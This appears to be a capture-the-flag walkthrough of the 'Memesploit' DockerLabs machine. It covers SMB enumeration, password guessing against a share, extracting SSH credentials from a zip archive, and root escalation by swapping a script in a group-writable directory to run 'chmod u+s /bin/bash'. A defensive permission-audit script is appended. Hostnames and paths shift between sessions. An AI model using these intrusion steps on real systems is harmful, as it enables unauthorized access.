MEMESPLOIT MACHINE
┌──(root㉿kali)-[/home/kali/Descargas]
└─# bash auto_deploy.sh memesploit.tar
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
└─# nmap -n -Pn -p- --min-rate 5000 -sV -vvv 172.17.0.2
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-25 14:58 CEST
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 14:58
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 14:58, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:58
Scanning 172.17.0.2 [65535 ports]
Discovered open port 445/tcp on 172.17.0.2
Discovered open port 139/tcp on 172.17.0.2
Discovered open port 22/tcp on 172.17.0.2
Discovered open port 80/tcp on 172.17.0.2
Completed SYN Stealth Scan at 14:58, 0.76s elapsed (65535 total ports)
Initiating Service scan at 14:58
Scanning 4 services on 172.17.0.2
Completed Service scan at 14:58, 11.02s elapsed (4 services on 1 host)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 14:58
Completed NSE at 14:58, 0.04s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 14:58
Completed NSE at 14:58, 0.01s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000040s latency).
Scanned at 2025-10-25 14:58:31 CEST for 11s
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.58 ((Ubuntu))
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.18 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
Once the host was up, Nmap, a port scanner, was used to discover which services were running on the machine. The scan revealed that ports 22 (SSH), 80 (HTTP), 139 and 445 (SMB) were open.
Next, the SMB service was enumerated with smbmap and enum4linux, which return information about the host such as shares and users, as shown below.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# smbmap -H 172.17.0.2 -u '' -p ''
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[+] IP: 172.17.0.2:445 Name: 172.17.0.2 Status: NULL Session
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
share_memehydra NO ACCESS
IPC$ NO ACCESS IPC Service (39fba155ef6a server (Samba, Ubuntu))
[*] Closed 1 connections
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# smbclient //172.17.0.2/print$
Password for [WORKGROUP\root]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# enum4linux -a 172.17.0.2
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Oct 25 15:04:13 2025
=========================================( Target Information )=========================================
Target ........... 172.17.0.2
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=============================( Enumerating Workgroup/Domain on 172.17.0.2 )=============================
[E] Can't find workgroup/domain
=================================( Nbtstat Information for 172.17.0.2 )=================================
Looking up status of 172.17.0.2
No reply from 172.17.0.2
====================================( Session Check on 172.17.0.2 )====================================
[+] Server 172.17.0.2 allows sessions using username '', password ''
=================================( Getting domain SID for 172.17.0.2 )=================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
====================================( OS information on 172.17.0.2 )====================================
[E] Can't get OS info with smbclient
[+] Got OS info for 172.17.0.2 from srvinfo:
39FBA155EF6A Wk Sv PrQ Unx NT SNT 39fba155ef6a server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
========================================( Users on 172.17.0.2 )========================================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: memehydra Name: memehydra Desc:
user:[memehydra] rid:[0x3e8]
==================================( Share Enumeration on 172.17.0.2 )==================================
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share_memehydra Disk
IPC$ IPC IPC Service (39fba155ef6a server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 172.17.0.2 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 172.17.0.2
//172.17.0.2/print$ Mapping: DENIED Listing: N/A Writing: N/A
//172.17.0.2/share_memehydra Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_CONNECTION_REFUSED listing \*
//172.17.0.2/IPC$ Mapping: N/A Listing: N/A Writing: N/A
=============================( Password Policy Information for 172.17.0.2 )=============================
Password:
[+] Attaching to 172.17.0.2 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] 39FBA155EF6A
[+] Builtin
[+] Password Info for Domain: 39FBA155EF6A
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 136 years 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 136 years 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
========================================( Groups on 172.17.0.2 )========================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
===================( Users on 172.17.0.2 via RID cycling (RIDS: 500-550,1000-1050) )===================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-21-2211627352-2962163924-2548321881 and logon username '', password ''
S-1-5-21-2211627352-2962163924-2548321881-501 39FBA155EF6A\nobody (Local User)
S-1-5-21-2211627352-2962163924-2548321881-513 39FBA155EF6A\None (Domain Group)
S-1-5-21-2211627352-2962163924-2548321881-1000 39FBA155EF6A\memehydra (Local User)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1001 Unix User\memesploit (Local User)
S-1-22-1-1002 Unix User\memehydra (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
================================( Getting printer info for 172.17.0.2 )================================
No printers returned.
enum4linux complete on Sat Oct 25 15:05:27 2025
enum4linux revealed two users, memehydra and memesploit, but no password. Attempts to open share_memehydra anonymously or with a guessed password for either user fail, as shown below.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# smbclient //172.17.0.2/share_memehydra -U ""
Password for [WORKGROUP\]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# smbclient //172.17.0.2/share_memehydra -U "memehydra"
Password for [WORKGROUP\memehydra]:
session setup failed: NT_STATUS_LOGON_FAILURE
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# smbclient //172.17.0.2/share_memehydra -U "memesploit"
Password for [WORKGROUP\memesploit]:
tree connect failed: NT_STATUS_ACCESS_DENIED
Next, a small password wordlist was created, as shown below.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# cat password.txt
fuerzabrutasiempre
memesploit_ctf
memehydra
The password memesploit_ctf from that list works for the user memehydra, so share_memehydra can now be listed; it contains a file named secret.zip, as shown below.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# smbclient //172.17.0.2/share_memehydra -U memehydra
Password for [WORKGROUP\memehydra]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Aug 31 17:15:13 2024
.. D 0 Sat Aug 31 17:15:13 2024
secret.zip N 224 Sat Aug 31 17:15:06 2024
24253528 blocks of size 1024. 0 blocks available
smb: \>
With the same credentials, the print$ share can also be listed, but it only holds the standard printer-driver directories, as shown below.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# smbclient //172.17.0.2/print$ -U memehydra
Password for [WORKGROUP\memehydra]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Oct 25 15:05:27 2025
.. D 0 Sat Oct 25 15:05:27 2025
W32ALPHA D 0 Mon Apr 8 16:49:25 2024
W32PPC D 0 Mon Apr 8 16:49:25 2024
x64 D 0 Sat Oct 25 15:05:27 2025
W32X86 D 0 Sat Oct 25 15:05:27 2025
COLOR D 0 Mon Apr 8 16:49:25 2024
WIN40 D 0 Mon Apr 8 16:49:25 2024
W32MIPS D 0 Mon Apr 8 16:49:25 2024
IA64 D 0 Mon Apr 8 16:49:25 2024
color D 0 Sat Oct 25 15:05:27 2025
ARM64 D 0 Sat Oct 25 15:05:27 2025
Connecting to IPC$ with the same credentials gives no listing (NT_STATUS_CONNECTION_REFUSED); secret.zip is then downloaded with get, as shown below.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# smbclient //172.17.0.2/IPC$ -U memehydra
Password for [WORKGROUP\memehydra]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_CONNECTION_REFUSED listing \*
smb: \>
smb: \> get secret.zip
getting file \secret.zip of size 224 as secret.zip (109,4 KiloBytes/sec) (average 109,4 KiloBytes/sec)
Running unzip on secret.zip prompts for a password, and the archive cannot be extracted without it, as shown below.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# unzip secret.zip
Archive: secret.zip
[secret.zip] secret.txt password:
skipping: secret.txt incorrect password
John the Ripper was then run with the rockyou.txt wordlist to recover the archive password, without success, as shown below.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt password.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:08 DONE (2025-10-25 15:16) 0g/s 1663Kp/s 1663Kc/s 1663KC/s "2parrow"..*7¡Vamos!
Session completed.
On a second try, unzip accepts the password and extracts secret.txt, which contains the credentials we are after, as shown below.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# unzip secret.zip
Archive: secret.zip
[secret.zip] secret.txt password:
password incorrect--reenter:
inflating: secret.txt
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# cat secret.txt
memesploit:metasploitelmejor
Next, connect over SSH with the credentials obtained in the previous step. Once logged in, sudo -l shows which commands memesploit may run as root.
┌──(root㉿kali)-[/home/kali/dockerlabs]
└─# ssh memesploit@172.17.0.2
The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established.
ED25519 key fingerprint is SHA256:CDT5FEJ/D3ouGQ/mBSBX03IkZwybpkLlqaVw9nVkjhs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts.
memesploit@172.17.0.2's password:
Welcome to Ubuntu 24.04 LTS (GNU/Linux 6.16.8+kali-amd64 x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Sat Aug 31 16:41:01 2024 from 172.17.0.1
memesploit@39fba155ef6a:~$
memesploit@39fba155ef6a:~$ sudo -l
Matching Defaults entries for memesploit on 39fba155ef6a:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User memesploit may run the following commands on 39fba155ef6a:
(ALL : ALL) NOPASSWD: /usr/sbin/service login_monitor restart
As we can see, the user may restart the login_monitor service as root without a password, so this should be the way to become root. The next step is to find where that service lives, as shown below.
memesploit@39fba155ef6a:/$ find / -name 'login_monitor' 2>/dev/null
/etc/init.d/login_monitor
/etc/login_monitor
memesploit@fbcef16e2208:/etc/login_monitor$ find / -name user.txt 2>/dev/null
/home/memesploit/user.txt
Gotcha! We have found the user flag, as shown below.
memesploit@fbcef16e2208:/etc/login_monitor$ cat /home/memesploit/user.txt
58a071849802bb0d1a782f928d5a4121
memesploit@39fba155ef6a:/$ cd /etc/login_monitor
memesploit@39fba155ef6a:/etc/login_monitor$ ls
actionban.sh activity.sh loggin.conf network.conf network.sh security.conf security.sh
memesploit@39fba155ef6a:/etc/login_monitor$ ls -la
total 36
drwxrwx--- 2 root security 4096 Aug 31 2024 .
drwxr-xr-x 1 root root 4096 Oct 25 14:57 ..
-rwxr-xr-x 1 root root 620 Aug 31 2024 actionban.sh
-rwxr-xr-x 1 root root 472 Aug 31 2024 activity.sh
-rw-r--r-- 1 root root 200 Aug 31 2024 loggin.conf
-rw-r--r-- 1 root root 224 Aug 31 2024 network.conf
-rwxr-xr-x 1 root root 501 Aug 31 2024 network.sh
-rw-r--r-- 1 root root 209 Aug 31 2024 security.conf
-rwxr-xr-x 1 root root 488 Aug 31 2024 security.sh
memesploit@fbcef16e2208:/etc/login_monitor$ cat activity.sh
#!/bin/bash
# Load the logging configuration
CONFIG_FILE="/etc/actionban/logging.conf"
if [ ! -f "$CONFIG_FILE" ]; then
    echo "Archivo de configuración de logs no encontrado: $CONFIG_FILE"
    exit 1
fi
source "$CONFIG_FILE"
# Simulate generating activity and error logs
echo "Simulación de actividad y errores"
# Record activity
echo "$(date): Actividad simulada" >> "$ACTIVITY_LOG"
# Record error
echo "$(date): Error simulado" >> "$ERROR_LOG"
memesploit@fbcef16e2208:/etc/login_monitor$ cat security.sh
#!/bin/bash
# Load the security configuration
CONFIG_FILE="/etc/actionban/security.conf"
if [ ! -f "$CONFIG_FILE" ]; then
    echo "Archivo de configuración de seguridad no encontrado: $CONFIG_FILE"
    exit 1
fi
source "$CONFIG_FILE"
# Simulate a security event
echo "Simulación de evento de seguridad con nivel $SECURITY_LEVEL"
# Record the security event in the file
echo "$(date): Evento de seguridad registrado con nivel $SECURITY_LEVEL" >> "$SECURITY_LOG"
memesploit@fbcef16e2208:/etc/login_monitor$ cat network.sh
#!/bin/bash
# Load the network configuration
CONFIG_FILE="/etc/actionban/network.conf"
if [ ! -f "$CONFIG_FILE" ]; then
    echo "Archivo de configuración de red no encontrado: $CONFIG_FILE"
    exit 1
fi
source "$CONFIG_FILE"
# Simulate the network status
echo "Simulación de estado de red en la interfaz $NETWORK_INTERFACE en el puerto $SERVICE_PORT"
# Record the network status in the file
echo "$(date): Estado de red en $NETWORK_INTERFACE, puerto $SERVICE_PORT" >> "$NETWORK_STATUS"
memesploit@39fba155ef6a:/etc/login_monitor$ id
uid=1001(memesploit) gid=1001(memesploit) groups=1001(memesploit),100(users),1003(security)
Matching Defaults entries for memesploit on fe790dc8f6b8:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User memesploit may run the following commands on fe790dc8f6b8:
(ALL : ALL) NOPASSWD: /usr/sbin/service login_monitor restart
memesploit@fe790dc8f6b8:~$ sudo /usr/sbin/service login_monitor restart
Stopping login_monitor...
Starting login_monitor...
memesploit@fe790dc8f6b8:/etc/login_monitor$ nano actionban.sh
memesploit@fe790dc8f6b8:/etc/login_monitor$ cp actionban.sh actionban.cp
memesploit@fe790dc8f6b8:/etc/login_monitor$ rm actionban.sh
rm: remove write-protected regular file 'actionban.sh'? y
memesploit@fe790dc8f6b8:/etc/login_monitor$ mv actionban.cp actionban.sh
memesploit@fe790dc8f6b8:/etc/login_monitor$ nano actionban.sh
Yes: the /etc/login_monitor directory is group-writable by security, and memesploit belongs to that group, so the root-owned actionban.sh can be copied, deleted and renamed back even though the file itself is not writable. The service runs that script as root on restart, so if we modify the file we can become root by adding the following command to it:
- chmod u+s /bin/bash
#!/bin/bash
# Path of the file that simulates the block log
BLOCK_LOG="/tmp/block_log.txt"
# Function to generate a random IP
generate_random_ip() {
    echo "$((RANDOM % 255 + 1)).$((RANDOM % 255 + 1)).$((RANDOM % 255 + 1)).$((RANDOM % 255 + 1))"
}
# Generate a random IP
IP_TO_BLOCK=$(generate_random_ip)
# Simulation message
MESSAGE="Simulación de bloqueo de IP: $IP_TO_BLOCK"
# Print the message to the terminal
echo "$MESSAGE"
# Record the block attempt in the file
echo "$(date): $MESSAGE" >> "$BLOCK_LOG"
echo "El registro ha sido creado en $BLOCK_LOG con la IP $IP_TO_BLOCK"
chmod u+s /bin/bash
After restarting the service with the sudo rule shown earlier, open a new SSH session in another terminal and start bash with -p so the SUID privileges are kept:
┌──(root㉿kali)-[/home/kali]
└─# ssh memesploit@172.17.0.2
memesploit@172.17.0.2's password:
Welcome to Ubuntu 24.04 LTS (GNU/Linux 6.16.8+kali-amd64 x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Sat Oct 25 18:16:20 2025 from 172.17.0.1
-bash-5.2$ bash -p
bash-5.2# whoami
root
bash-5.2# find / -name root.txt
/root/root.txt
bash-5.2# cat /root/root.txt
b57069733c1fbdf4795c0b36597c307a
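Why the file replacement above worked, as an added example that is not part of the original writeup: the script below applies the POSIX rule that unlinking or renaming a file needs write and execute permission on the containing directory, not write permission on the file, to the ls -la and id output captured earlier (embedded as constructed sample text). The names parse_ls, parse_id and audit are my own, and the sticky-bit case it handles is not shown on this page.

```python
"""Audit which files in a directory a given user could replace.

Added example (not from the original writeup). Models the POSIX rule
that unlinking or renaming a file needs write+execute permission on the
containing directory, not write permission on the file itself, and
applies it to the `ls -la` and `id` output captured in the session.
"""
import re
from dataclasses import dataclass

# Constructed sample input: the /etc/login_monitor listing and the id
# output shown in the session above.
LS_OUTPUT = """\
drwxrwx--- 2 root security 4096 Aug 31 2024 .
drwxr-xr-x 1 root root 4096 Oct 25 14:57 ..
-rwxr-xr-x 1 root root 620 Aug 31 2024 actionban.sh
-rwxr-xr-x 1 root root 472 Aug 31 2024 activity.sh
-rw-r--r-- 1 root root 200 Aug 31 2024 loggin.conf
"""
ID_OUTPUT = ("uid=1001(memesploit) gid=1001(memesploit) "
             "groups=1001(memesploit),100(users),1003(security)")

# type flag, nine permission chars, links, owner, group, size, 3 date fields, name
LS_RE = re.compile(
    r"^([-dl])([rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+"
    r"\s+\S+\s+\S+\s+\S+\s+(.+)$")


@dataclass
class Entry:
    name: str
    is_dir: bool
    mode: str    # the nine permission characters after the type flag
    owner: str
    group: str


def parse_ls(text):
    """Parse `ls -la` lines into Entry objects (skips 'total' and blanks)."""
    entries = []
    for line in text.splitlines():
        m = LS_RE.match(line.strip())
        if m:
            kind, mode, owner, group, name = m.groups()
            entries.append(Entry(name, kind == "d", mode, owner, group))
    return entries


def parse_id(text):
    """Return (username, set of group names) from `id` output."""
    user = re.search(r"uid=\d+\(([^)]+)\)", text).group(1)
    groups = set(re.findall(r"\d+\(([^)]+)\)", text.split("groups=")[1]))
    return user, groups


def _bits(entry, user, groups):
    """(read, write, exec) for this user: owner, then group, then other.
    root's bypass of DAC checks is deliberately not modelled."""
    if user == entry.owner:
        rwx = entry.mode[0:3]
    elif entry.group in groups:
        rwx = entry.mode[3:6]
    else:
        rwx = entry.mode[6:9]
    # 's' / 't' in the exec slot still grant execute; 'S' / 'T' do not.
    return rwx[0] == "r", rwx[1] == "w", rwx[2] in "xst"


def audit(ls_text, id_text):
    """Map each file to 'writable', 'replaceable' (delete + recreate via
    directory permissions) or 'protected' for the user in id_text."""
    entries = parse_ls(ls_text)
    user, groups = parse_id(id_text)
    cwd = next(e for e in entries if e.name == ".")
    _, dir_w, dir_x = _bits(cwd, user, groups)
    # With the sticky bit set on the directory, only a file's owner may unlink it.
    sticky = cwd.mode[8] in "tT"
    verdict = {}
    for e in entries:
        if e.name in (".", ".."):
            continue
        _, file_w, _ = _bits(e, user, groups)
        if file_w:
            verdict[e.name] = "writable"
        elif dir_w and dir_x and (not sticky or e.owner == user):
            verdict[e.name] = "replaceable"
        else:
            verdict[e.name] = "protected"
    return verdict


if __name__ == "__main__":
    for name, state in audit(LS_OUTPUT, ID_OUTPUT).items():
        print(f"{name:15} {state}")
```

Every root-owned file in the listing comes back as replaceable for memesploit, which is exactly the condition that let actionban.sh be swapped; the same check run by a user outside the security group, or with a sticky bit on the directory, reports them as protected.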
Thank you very much for reading this article
I hope you liked and learned something new
This article has been written for ethical purposes
Good Hack